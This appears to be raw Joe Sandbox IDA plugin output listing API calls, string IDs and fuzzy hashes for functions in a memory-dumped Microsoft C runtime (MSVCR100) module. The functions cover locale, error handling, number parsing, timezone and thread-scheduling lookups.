                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6FDBBE65), ref: 6FDCA293
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA29C
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6FDBBE65), ref: 6FDCA2A2
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,?,?,6FDBBE65), ref: 6FDCA2BA
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,?,?,6FDBBE65), ref: 6FDCA2C8
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6FDBBE65), ref: 6FDCA2E1
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA2E4
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6FDBBE65), ref: 6FDCA2EA
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6FDBBE65), ref: 6FDCA30A
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA30D
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6FDBBE65), ref: 6FDCA327
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA32A
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6FDBBE65), ref: 6FDCA344
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA347
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6FDBBE65), ref: 6FDCA361
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA364
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6FDBBE65), ref: 6FDCA37E
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA381
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6FDBBE65), ref: 6FDCA39F
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA3A2
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6FDBBE65), ref: 6FDCA3C0
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA3C3
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6FDBBE65), ref: 6FDCA3E1
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA3E4
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6FDBBE65), ref: 6FDCA402
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA405
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6FDBBE65), ref: 6FDCA423
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA426
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6FDBBE65), ref: 6FDCA444
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA447
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6FDBBE65), ref: 6FDCA465
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA468
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6FDBBE65), ref: 6FDCA486
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA489
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6FDBBE65), ref: 6FDCA4A7
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA4AA
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6FDBBE65), ref: 6FDCA4C8
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA4CB
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc$ErrorLast$??0scheduler_resource_allocation_error@Concurrency@@ExceptionThrow
                                                                                                          • String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
                                                                                                          • API String ID: 2974244316-2643937717
                                                                                                          • Opcode ID: 6ffc074b08dc1ee2051f3eebbefcdbcdb2020ca09c98777fa3d4f96909c0a883
                                                                                                          • Instruction ID: 49aabd4212e51217f97844d13c5130f95041dbb44d9601b680889466300fd5ac
                                                                                                          • Opcode Fuzzy Hash: 6ffc074b08dc1ee2051f3eebbefcdbcdb2020ca09c98777fa3d4f96909c0a883
                                                                                                          • Instruction Fuzzy Hash: 62517AF16007199AAF94ABB98C75C7B7E9DEB47261310452BE406C3144FE39F851DF22
                                                                                                          APIs
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FD83E5A
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FD83EF7
                                                                                                            • Part of subcall function 6FD821CC: _isdigit_l.MSVCR100(?,00000000), ref: 6FD821E3
                                                                                                          • isdigit.MSVCR100(0000002B,?,?), ref: 6FD84093
                                                                                                          • _fgetwc_nolock.MSVCR100(?,?,?), ref: 6FD840DB
                                                                                                          • _fgetwc_nolock.MSVCR100(?,?,?), ref: 6FD8435E
                                                                                                          • _errno.MSVCR100 ref: 6FDAB962
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAB96D
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDAB9B2
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _fgetwc_nolockisdigitiswctype$_errno_invalid_parameter_noinfo_isdigit_l
                                                                                                          • String ID: *$F$I$L$N$h$l$o$w
                                                                                                          • API String ID: 2196123123-3522493044
                                                                                                          • Opcode ID: 0c91233596b30c7e71b4d50b987b288557a63b80ee7ede61ba196039b3c45417
                                                                                                          • Instruction ID: a0bf4b1d422c3b00d669b0f2cc1795463561d42ca3e12811b96b69e816ba70ed
                                                                                                          • Opcode Fuzzy Hash: 0c91233596b30c7e71b4d50b987b288557a63b80ee7ede61ba196039b3c45417
                                                                                                          • Instruction Fuzzy Hash: A6A26E75D44369CADBA18B28CC88BEDB7B8AF06314F1001DBD4A9A6191DB71BEC1CF54
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDE231D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDE2328
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • isspace.MSVCR100(?,?,?), ref: 6FDE2367
                                                                                                          • isspace.MSVCR100(00000000,?,?), ref: 6FDE238E
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FDE240C
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: isspace$_errno_invalid_parameter_invalid_parameter_noinfoisdigit
                                                                                                          • String ID: $*$8$?$F$F$I$L$N$h$l$w
                                                                                                          • API String ID: 3351369290-344177605
                                                                                                          • Opcode ID: 8af133c1dfc2f3857417520f7fc0a8cbeda78074d8eea2543b59604cb2544bb4
                                                                                                          • Instruction ID: fb2a86f5114ce5cfa3ad428a9d5117bebb50026d749f426e131e3aac4f374153
                                                                                                          • Opcode Fuzzy Hash: 8af133c1dfc2f3857417520f7fc0a8cbeda78074d8eea2543b59604cb2544bb4
                                                                                                          • Instruction Fuzzy Hash: F8827C71D4836ADEDFA28B24CC517E9BBB5AF0630AF1401DAC598A6191CB307EC5CF61
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDE41AF
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDE41BA
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDE41FA
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDE4229
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FDE42B7
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: iswctype$_errno_invalid_parameter_invalid_parameter_noinfoisdigit
                                                                                                          • String ID: *$F$F$I$L$N$h$l$w
                                                                                                          • API String ID: 4126605999-4069441466
                                                                                                          • Opcode ID: 59fae721f1fe36c5f56f24d18574322d12028bfebbc0d41da64bae8055930b2f
                                                                                                          • Instruction ID: aa181308fe70cf7cf2ac9bfa45d9a7a95fcf087e2c7e8104037a38106e615650
                                                                                                          • Opcode Fuzzy Hash: 59fae721f1fe36c5f56f24d18574322d12028bfebbc0d41da64bae8055930b2f
                                                                                                          • Instruction Fuzzy Hash: 39927A79C453AACADBA19B24CC88BEDB6B4BF06314F1041EBD458AA191D774BEC1CF50
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE6E76
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE6E85
                                                                                                          • _isleadbyte_l.MSVCR100(?,?,?,?), ref: 6FDE739D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE6E90
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strtol.MSVCR100(?,?,0000000A,?,?), ref: 6FDE6F9C
                                                                                                          • memset.MSVCR100(?,00000000,00000640,?), ref: 6FDE6FCA
                                                                                                          • strtol.MSVCR100(?,?,0000000A,?,?), ref: 6FDE6FF5
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _errnostrtol$_invalid_parameter_invalid_parameter_noinfo_isleadbyte_lmemset
                                                                                                          • String ID: $'$*$@$c$g$h$l$w
                                                                                                          • API String ID: 1292866728-3540947701
                                                                                                          • Opcode ID: e2b9bb2f872431fd23ce85e89872c40d04c6f39ddfc7195ccd7ed39c3e5c54a1
                                                                                                          • Instruction ID: 1a7907923aa495af14b83d3617161be36c0b3043afa0f704eafc73d5c64e03fe
                                                                                                          • Opcode Fuzzy Hash: e2b9bb2f872431fd23ce85e89872c40d04c6f39ddfc7195ccd7ed39c3e5c54a1
                                                                                                          • Instruction Fuzzy Hash: EEB26970904769EADBE18B28CD40799B7F1FF02315F1482DAD4E8A6292DB317AC5CF90
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0B5D
                                                                                                          • _errno.MSVCR100 ref: 6FDD0B64
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0B6F
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcspbrk.MSVCR100(?,6FD977E4), ref: 6FDD0B83
                                                                                                          • _errno.MSVCR100 ref: 6FDD0B8E
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0B98
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfowcspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 4245593769-3176372042
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0FAE
                                                                                                          • _errno.MSVCR100 ref: 6FDD0FB5
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0FC0
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcspbrk.MSVCR100(?,6FD977E4), ref: 6FDD0FD4
                                                                                                          • _errno.MSVCR100 ref: 6FDD0FDF
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0FE9
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfowcspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 4245593769-3176372042
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0732
                                                                                                          • _errno.MSVCR100 ref: 6FDD0739
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0744
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcspbrk.MSVCR100(?,6FD977E4), ref: 6FDD0758
                                                                                                          • _errno.MSVCR100 ref: 6FDD0763
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD076D
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfowcspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 4245593769-3176372042
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCF011
                                                                                                          • _errno.MSVCR100 ref: 6FDCF018
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCF023
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _mbspbrk.MSVCR100(?,6FDB301C), ref: 6FDCF037
                                                                                                          • _errno.MSVCR100 ref: 6FDCF042
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCF04C
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 790986403-3176372042
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCFDB0
                                                                                                          • _errno.MSVCR100 ref: 6FDCFDB7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCFDC2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _mbspbrk.MSVCR100(?,6FDB301C), ref: 6FDCFDD6
                                                                                                          • _errno.MSVCR100 ref: 6FDCFDE1
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCFDEB
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 790986403-3176372042
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD96362
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • __tzname.MSVCR100(6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD9636B
                                                                                                          • _get_timezone.MSVCR100(?,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD96377
                                                                                                          • _get_daylight.MSVCR100(6FD96985,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD96389
                                                                                                          • _get_dstbias.MSVCR100(00000008,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD9639B
                                                                                                          • ___lc_codepage_func.MSVCR100(6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD963A9
                                                                                                            • Part of subcall function 6FD91D44: strlen.MSVCR100(00000000,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FD91D62
                                                                                                            • Part of subcall function 6FD91D44: strlen.MSVCR100(00000000,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FD91D71
                                                                                                            • Part of subcall function 6FD91D44: _mbsnbicoll.MSVCR100(00000000,00000000,00000000,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FD91D8D
                                                                                                          • GetTimeZoneInformation.KERNEL32(6FE25DE8,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD963F0
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6FE25DEC,00000000,?,0000003F,00000000,?), ref: 6FD9646E
                                                                                                          • WideCharToMultiByte.KERNEL32(000000FF,00000000,6FE25E40,000000FF,?,0000003F,00000000,?), ref: 6FD964A1
                                                                                                          • __timezone.MSVCR100 ref: 6FD964C7
                                                                                                          • __daylight.MSVCR100 ref: 6FD964D1
                                                                                                          • __dstbias.MSVCR100 ref: 6FD964DB
                                                                                                          • strcmp.MSVCR100(00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99C9
                                                                                                          • free.MSVCR100(00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99E2
                                                                                                          • strlen.MSVCR100(00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99E9
                                                                                                          • _malloc_crt.MSVCR100(00000001,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99F0
                                                                                                          • strlen.MSVCR100(00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A06
                                                                                                          • strcpy_s.MSVCR100(00000001,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A14
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A29
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A2F
                                                                                                          • strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6FDA9A4A
                                                                                                          • atol.MSVCR100(-00000003), ref: 6FDA9A67
                                                                                                          Similarity
                                                                                                          • API ID: strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__timezone__tzname_get_daylight_get_dstbias_get_timezone_invoke_watson_lock_malloc_crt_mbsnbicollatolstrcmpstrcpy_sstrncpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1088170971-0
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(00000083,00000001,000000BC,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88470
                                                                                                          • GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD884C4
                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88516
                                                                                                          • IsValidLocale.KERNEL32(?,00000001,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88529
                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88573
                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6FD88587
                                                                                                          • _itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6FD88598
                                                                                                          Similarity
                                                                                                          • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itoa_s
                                                                                                          • String ID: Norwegian-Nynorsk
                                                                                                          • API String ID: 2670470560-461349085
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                                                          • API String ID: 0-3028518216
                                                                                                          • Opcode ID: f1cff235ef437ce65f775c1e64b95a2860533f44d3e66162b80388d6a550f555
                                                                                                          • Instruction ID: 9b9ee4d457afa902f903718453120d8dc17481ef31313fbf96cfba309067f85e
                                                                                                          • Opcode Fuzzy Hash: f1cff235ef437ce65f775c1e64b95a2860533f44d3e66162b80388d6a550f555
                                                                                                          • Instruction Fuzzy Hash: F0826B72E50609DBEB84CBA9C990BED77B9AF49304F04413AE521E72C0EB39F945CB54
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6FD8862D
                                                                                                          • free.MSVCR100(?,?,?,00000000), ref: 6FD8864E
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6FD8884F
                                                                                                          • strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6FD88869
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6FD888D4
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6FD888E3
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6FD888FC
                                                                                                          • free.MSVCR100(00000000), ref: 6FDB06D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$_calloc_crtfree$strncpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2432546303-0
                                                                                                          • Opcode ID: 6b6db28b64349e33ab1b482b7392df52c450741bd506f4610dbe2bd62cea7ea3
                                                                                                          • Instruction ID: 858b6ae762041721279c9cc0718a90b7285d87d7ea4e6006d2643198dc030021
                                                                                                          • Opcode Fuzzy Hash: 6b6db28b64349e33ab1b482b7392df52c450741bd506f4610dbe2bd62cea7ea3
                                                                                                          • Instruction Fuzzy Hash: 165190B590535AEBEB919F248D46FAE3BB8AF01364F104056E824E6190EB31B960CF60
                                                                                                          APIs
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000016), ref: 6FE009ED
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • strcpy_s.MSVCR100(?,00000016,1#IND,00000000,00000000,00000000,00000000,00000000,?,?,00000016), ref: 6FE00A22
                                                                                                          • strcpy_s.MSVCR100(?,00000016,1#QNAN,?,?,00000016), ref: 6FE00A3F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Processstrcpy_s$CurrentTerminate_invoke_watson
                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$T
                                                                                                          • API String ID: 3371357731-740461495
                                                                                                          • Opcode ID: b7d3b5948e91c867a01c6c3e91b1a0335cb82f939972d3fe5107535befe2f7fd
                                                                                                          • Instruction ID: eb52fa5a8f3d88789bd16fa4754bd03fba10ea2ed6ef7376ad2bed620034ac71
                                                                                                          • Opcode Fuzzy Hash: b7d3b5948e91c867a01c6c3e91b1a0335cb82f939972d3fe5107535befe2f7fd
                                                                                                          • Instruction Fuzzy Hash: FA528F72D0425A8FDF14DFA8C8403EEBBB1FF44308F60916AD955AB380E7749A52CB91
                                                                                                          APIs
                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 6FDF6C9D
                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6FDF6CB5
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6FDF6CC5
                                                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6FDF6CD5
                                                                                                          • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 6FDF6D27
                                                                                                          • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 6FDF6D3C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                          • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                          • API String ID: 3290314748-423161677
                                                                                                          • Opcode ID: c201adc8ef99ad27af87f02f000726601aa7ddced626118b8274370cf24b6647
                                                                                                          • Instruction ID: 4bc631ea80d38264410c7f1c560f995121f9ba10feac0148812010c3c3768866
                                                                                                          • Opcode Fuzzy Hash: c201adc8ef99ad27af87f02f000726601aa7ddced626118b8274370cf24b6647
                                                                                                          • Instruction Fuzzy Hash: 3231A971A01629EBEF50CFA4CC84EEE77B8EB06755B154126E511E7540DB30BA05CBA0
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD885CD
                                                                                                          • strcmp.MSVCR100(00000000,ACP,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD928A7
                                                                                                          • strcmp.MSVCR100(00000000,OCP,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FDB1764
                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FDB177D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
